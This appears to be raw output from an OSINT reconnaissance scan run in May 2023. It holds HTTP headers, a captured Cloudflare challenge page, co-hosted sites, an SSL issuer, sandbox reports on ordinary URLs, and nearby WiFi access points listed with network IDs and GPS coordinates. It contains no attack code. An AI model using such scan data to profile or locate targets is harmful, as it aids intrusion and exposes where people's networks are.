| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=fiT%2Fr8CwWrAQPZkt8VpkeQoVoGOR6HuHPRasaTPIcW93tfGJar9pTikOfGdSWQA5SZHUpCyuk56gghqLlY9yU5dVDbV5Bs9yRYYuQ0D9hZe3tyWEFUstq9XRCg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:21 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c594cb34339-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:06 | URL (Form) | No | Page Information | 0 | 0 | 3 | 0 | None | http://www.ayhu.xyz | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="o9rkiN63h_dC1MXH2ewnO9VeNInpcF4XTtlC3.Ope.M-1683860062-0-AdUguWWDLVlZxsWb6e1bnqomUGdvKH9Hr8OR9XhDVbWy_UNZDFZLD8-BRJaoUzBMnZ4MBtuUzqAf-y1NVIXFBZc2zpThNEMVcsemZ6G3H2y2RdwaGI22EiA1S326BJRlVE4Ae2G6hV1-y96EsTpLgRijeuFFSHz05y1jK0LMHQT6Yul8T61BIXmvzdMkcho4NRYjRqIaGwnrNt3GHyXHuLD9Kg0Z1PswrdZsR5u8cj9YNRG5tPHVjIwdXSU_H7FvumTVKSb2DSCVu7zno--l-x_ursgemNqA1Eu9esEfAcEZErO2ynNNPle4iy35Q-002AvCnrTStuzsV9WenG-kzkwfzH4Bgm9BgZjZ2SzceeiUvpx0VbFQ3pFatklpu5sVBuMECIKb-C35grQD9hIe5CnF2tIuq3LpSjTYWdY_G-taMdpge2EijRLIBI6Kfm3KCKgrmIm-M_kaOkhT6zwNZKrbtrmrwvHusBRZM8mDqXK6BGxQEYolgs9YfSL0l717dfEhPntRoL6ZMAEy83CFiWTndZ1SzKSh5MxSqRh8JYSn7-hlp9tzN-SB8T0mkCkP87rm0gHB2Nc1YNmJH6a6djf3APAwio8E6jQftS4RNyx5lSUUZ_BnFys-ZXFUzYbxVs_s5utzzMkEYOyUrEjMwlbzK1bmHQXnmHfBHDfW-9w0KMV_I2KXURlKdWp_aVGaYPgU9RQpOrOu5jXRwZ5WWo3nXJCoJubmH-xr5xweBUbZG-SrvNgarDFttshord388LcpI4vf_DPi5QAhha2ONgO4nEYcsvGjPWmE5gBNnwndanRmSOkYLNoIKdyVDvafFa_9wxBk6pKwvUGADjN1yYITiFNd4Av6OjiMF0eCD0B-rMcf1K_RyJAW0Q63e569MyoALgsa5LuF6A9Fao0NuRtVokTtKXFjE683wyQoxz2rVadCdcz1SAkPujj4gsPBtzmyTzaZ0eAhZEu4ZktRZ3yW_kCzFaoZlWWXPLmMSYOISs0fLmCihg46UN9oyRLijuEDM_jHg4LTV2TnCzG6rH5ukfU2q3hIf7DNVmpydIO4964Rwd7yky69HogBFyvVcLvLJiau__mlfv9Zd8rpuWQeyviCGIKTRzsIwfkMqNPNyw8X9ilDjYLz8Er-YKFTiBYzKowqSDcLfsInmyu-GY3Q4CRe6azk1q2PDI5jsKPqVXZnDO6xM5WOgDfsUs8jCGX-Y7pnubkolyphepCOCRuJYkPER9RlRKn9TP1Iu5pT3zvM--Qn_g2xND5bfgguBbZ7_xzC6vrG4uq7pRN86Jyn1eh0aJoS1o3moXbGaKVZMFxn9St9eHP_LBzqatvidcntyoQnZyEuvoBGzmB7bxsXvanE_k1kK-flL0DxtFCoSL_hYsi2QdekeHyb0moJOnxYk8nOvpGRVJW2aeFOS6zzQYrTf1ZYVM7iyRgHYPN8uylozJaFR27equ7FqddcsitgcuSFaFlYteDEO4eAuImRVXD5QnWHTDDLK-J-a7cd7n5pHrzsbNbpwPeit55PzKCpzI484EAksVFlNAkrwC4SqRB6KhjvHJRu2SsinDAvuebN5jt7N0scno6aUyjSzxwSSpVf6bZrrSm-p-5sQDUjLp64NRXWVN8wvA3_1f2gF_Vosd3y9Sp0fSOsU2F6EIdZdWuHYetxrmSNE6AHJ3RT_C04YBvG6_Q9PkJsb86B49AEElj23DQaHfl1GA9qGlbppJY5scudrsxneqxrD58hLbvdzxrWwdzLczRciePhFl8OKW5eaSkWmK-s65YIEnBLOSnaXmYwPzvjg8f67iFNC-e3l5m0MDQVx52PRj2vf8DWG_AfPmw2afbxcw9ppplZ9oiixK20YnEv54WswcS_oGpXEwjRNaflmeY-Y06FMexN5UEccQFy7OcRAYdF-UVs7RwoJUdks1JoRoK9OtuCZ-KgdWRayYvkrBZh1irLAwBozTjJSzJVowS3-M9iXqAD-o4GZBMK9eAUQlmuEIIQAf4f1TCN4loJA-4yETDBP4eorxfgJm9hdR63VxYMIHAkqccOTphwj01rk_8nG1uU4rJrScaAyK8AS_kQ2UytoRgp8VoNR_d7rmE_GZgpIDjlZ7mYr5nvR22Zau-p4gmFaOvdsk2jjUaqisfuqgg6D7ilZ29ja7S9UD52x-HqjxmP4JRdKMs3zwtM2aBKs0yMaMXiLr0T0j3f1FktvbG7soBZaonR97fM1qjr28AlqpELx3WuIvTiKLBZ2gxE_Tjenn0-IC2XQdN8IEIXfw9F7jVJZ6FyGJ9Yx4YqJ3kmX0qXi9iX1jb-Y3YZwJ6j4tTSRr8_tAhbW33UaKc3ULwKwGZ9g9Ru0mgnq0hVusSVy31FLGpM6QZZ4iZhokIoEs5L-lSF6-Qt-6-GQgAAhgrRM_mFp17cJjzl0kVV9PTe5Y-EYxGWlJKX7FVEGARcAfwWh_GITW_xYClIpKaR9CMUgzm4MqfOkVCd-6Z7AHBczBYiCIlRejFdx7yIdIPo__-pVcOwTW-jE9Y6Ncj1gf1h">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'TOYbkC9rgCOmr8G89iiZTp2nx3xahTKUWPvvRReOro8JJJL4fq23OOGaFt6uHWiVLv9ABlTzh5akOOr2iBc53fzTOjW4K5sc+Aw6LUirtlJizLJHy/2vFLg/egZuLvz4Jk1sjjx3a/wkUOpJytZhNSfbkgf1KJELFbBUDkPz+PDulg0Nr57X1+oFwk+MMf/JnTKFf63zzoaJCmg1UGm5a8QRiSNvGBM7/i8bWTpF39rRrej+fONG8+Xfj87ptGWoEpG+c7Okgjh50kVvVQ1MM2KNt9Wf0uYN3Y5L83KgO0XjOeom2ZbKiTxcFZ+mcfEnOH7y4gawPSo1rxstuxKlhzZzfeOfN4VyUmxDs0BnYa2jrym4m5FzCmfrBBJJ1wCoAVXGMuoymG/pQ4+/22Y5ByC1Z8p7u74Rp83gpUfEv8bmNvjC33vYku3SIvYOYc5AdNT18IswGxpIjLbRTT8QLo1fadzodr50qCzr5X5Vi06KH6SQu3sOWSfwXNxLiQrSqFvCVjlirKim8KagkYwrflhXda6MuRH8Nh6ZQFP87/eO2YkXCpF9UX1MgEu6CzGx',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:00:55 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00ihsan.github.io | 185.199.111.153 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:0C:41:79:25:FC) | 39.0469, -77.4903 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | HOME-4C62 (Net ID: 00:1D:D5:6D:4C:60) | 32.8608, -79.9746 |
| 2023-05-12 02:45:43 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680547171807-xds.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697389173-1680697389172.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697434044-1680697434044.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1677698083219-brnaded+logo.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1678225583765-dohler.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697496429-1680697496429.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1677247635626-opal+bpm.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1676063538457-wise.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1675882735829-sp-_0000_fair+trade.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1682640165836-c%26s.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697503545-1680697503545.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1677247758835-jpg.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697381119-1680697381118.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697479996-1680697479996.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1681215695937-meijer+logo.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680701520460-_0005_united+dairy+farmers.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697487654-1680697487654.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1675882417313-sp-_0005_mbd.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1678225507390-daymon.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697462819-1680697462818.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1675882659094-sp-_0002_supply+pilot.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1679240654452-_0010_cvs.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680988101878-fmi-logo-2019.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1681773687460-southeastern+grocers.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697422023-1680697422023.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1681239531331-day+1.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1675882703373-sp-_0001_voccii.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1681239550042-day+two.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/37678%2f1567194570417-down.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1679679993005-_0031_target.jpg', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680697403560-1680697403560.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1680987900223-equatorlogo.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1679689212198-new+quad+2023.png', u'type': u'extracted', u'verdict': u'suspicious'}, {u'url': u'https://s3.amazonaws.com/uploads.webconnex.com/120734%2f1681239570587-day+three.jpg', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 30, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://velocityinstitute.us16.list-manage.com/track/click?u=28a49397252972a9e77d3ec77&id=7e8847aed8&e=5332e81415', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:3572:304:WilStaging_02"\n "Local\\SM0:3572:120:WilError_01"\n "SM0:3572:120:WilError_01"\n "InternetShortcutMutex"\n "SM0:3572:304:WilStaging_02"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"172.64.155.76:443"\n "142.250.189.234:443"\n "104.18.11.207:443"\n "151.101.2.123:443"\n "142.250.189.163:443"\n "54.231.170.48:443"\n "65.8.158.103:443"\n "54.244.116.26:443"\n "185.199.111.153:443"\n "23.39.1.127:443"\n "65.8.158.85:443"\n "192.229.163.25:443"\n "192.225.158.103:443"\n "74.125.137.155:443"\n "3.233.152.253:443"\n "104.244.42.72:443"\n "192.225.158.1:443"\n "192.225.158.3:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"aa.online-metrix.net"\n "bouncer.webconnex.com"\n "browser-http-intake.logs.datadoghq.com"\n "cdn.uploads.webconnex.com"\n "fonts.googleapis.com"\n "fonts.gstatic.com"\n "h.online-metrix.net"\n "images.webconnex.com"\n "ncwzrc4khcpkdl5627ygaagnzyyzeavjwr3ydmpbab8d5fa5a572c602sac.d.aa.online-metrix.net"\n "netdna.bootstrapcdn.com"\n "platform.twitter.com"\n "purecatamphetamine.github.io"\n "s3.amazonaws.com"\n "static.wepay.com"\n "stats.g.doubleclick.net"\n "syndication.twitter.com"\n "t.wepay.com"\n "velocityinstitute.regfox.com"\n "z.moatads.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string "platform.twitter.com" (Indicator: "dir "; File: "PCAP")\n Found string "syndication.twitter.com" (Indicator: "dir "; File: "PCAP")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string "js.src = "https://platform.twitter.com/widgets.js"" (Indicator: "dir "; File: "urlref_httpsvelocityinstitute.us16.list-manage.comtrackclicku_28a49397252972a9e77d3ec77_id_7e8847aed8_e_5332e81415")\n Found string "})(document, "script", "twitter-wjs")" (Indicator: "dir "; File: "urlref_httpsvelocityinstitute.us16.list-manage.comtrackclicku_28a49397252972a9e77d3ec77_id_7e8847aed8_e_5332e81415")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""4amscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautiiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""beautyandwhiskey.com"," (Source: wallet-stable.json, Indicator: "key.com")\n ""bellagracehealth | 185.199.111.153 |
| 2023-05-12 02:44:09 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 1 | 0 | None | C=US,O=DigiCert Inc,CN=DigiCert TLS RSA SHA256 2020 CA1 | battleb0t.xyz |
| 2023-05-12 02:58:02 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://www.borisfx.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\InternetShortcutMutex"\n "IsoScope_b44_IESQMMUTEX_0_519"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_b44_IESQMMUTEX_0_303"\n "IsoScope_b44_IE_EarlyTabStart_0xd3c_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "UpdatingNewTabPageData"\n "IsoScope_b44_ConnHashTable<2884>_HashTable_Mutex"\n "Local\\ZonesCacheCounterMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_b44_IESQMMUTEX_0_331"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2884"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b44_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_b44_IESQMMUTEX_0_303"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"159.203.154.119:80"\n "159.203.154.119:443"\n "192.124.249.24:80"\n "52.203.36.44:443"\n "104.18.22.52:443"\n "65.8.55.208:443"\n "104.17.24.14:443"\n "104.17.210.204:443"\n "34.148.97.127:443"\n "104.16.86.20:443"\n "151.101.1.137:443"\n "142.251.211.238:443"\n "104.16.255.71:443"\n "143.244.60.109:443"\n "142.251.33.104:443"\n "13.249.139.119:80"\n "142.251.211.227:80"\n "192.124.249.36:80"\n "65.8.55.48:80"\n "172.64.202.28:443"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "urlref_httpwww.borisfx.com" as clean (type is "HTML document ASCII text with CRLF line terminators")\n Antivirus vendors marked dropped file "TarCB08.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "TarCB78.tmp" as clean (type is "data")'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"backend.borisfx.com"\n "borisfx-com-res.cloudinary.com"\n "js-na1.hs-scripts.com"\n "js.gleam.io"\n "js.hs-banner.com"\n "js.hscollectedforms.net"\n "js.hubspot.com"\n "ka-f.fontawesome.com"\n "nexus-websocket-a.intercom.io"\n "o.ss2.us"\n "ocsp.godaddy.com"\n "ocsp.pki.goog"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.sca1b.amazontrust.com"\n "ocsp.sectigo.com"\n "ocsp.starfieldtech.com"\n "pi.pardot.com"\n "sdks.shopifycdn.com"\n "www.borisfx.com"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.borisfx.com"\n "ocsp.starfieldtech.com"\n "ocsp.pki.goog"\n "o.ss2.us"\n "ocsp.godaddy.com"\n "ocsp.rootg2.amazontrust.com"\n "ocsp.rootca1.amazontrust.com"\n "ocsp.sectigo.com"\n "ocsp.sca1b.amazontrust.com"'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-37', u'name': u'Drops files inside appdata directory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 0, u'type': 8, u'description': u'Dropped file: "NJUG3KIC.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NJUG3KIC.txt]- [targetUID: 00000000-00002924]\n Dropped file: "8VT2SPF4.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\8VT2SPF4.txt]- [targetUID: 00000000-00002924]\n Dropped file: "P98EPUFF.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P98EPUFF.txt]- [targetUID: 00000000-00002924]\n Dropped file: "Y04LLF3T.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\Y04LLF3T.txt]- [targetUID: 00000000-00002924]\n Dropped file: "P3D2J0NU.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\P3D2J0NU.txt]- [targetUID: 00000000-00002924]\n Dropped file: "60VUP2GP.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\60VUP2GP.txt]- [targetUID: 00000000-00002924]\n Dropped file: "HH6MLV23.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\HH6MLV23.txt]- [targetUID: 00000000-00002924]\n Dropped file: "BJCZPFNA.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BJCZPFNA.txt]- [targetUID: 00000000-00002924]\n Dropped file: "ZU42XX7W.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\ZU42XX7W.txt]- [targetUID: 00000000-00002924]\n Dropped file: "5RXK9MEV.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5RXK9MEV.txt]- [targetUID: 00000000-00002924]\n Dropped file: "S1T0H2ZW.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\S1T0H2ZW.txt]- [targetUID: 00000000-00002924]\n Dropped file: "JH132F07.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\JH132F07.txt]- [targetUID: 00000000-00002924]\n Dropped file: "KVO1BIM2.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\KVO1BIM2.txt]- [targetUID: 00000000-00002924]\n Dropped file: "3FN51MI9.txt" - Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\3FN51MI9.txt]- [targetUID: 00000000-00002924]\n Dropped 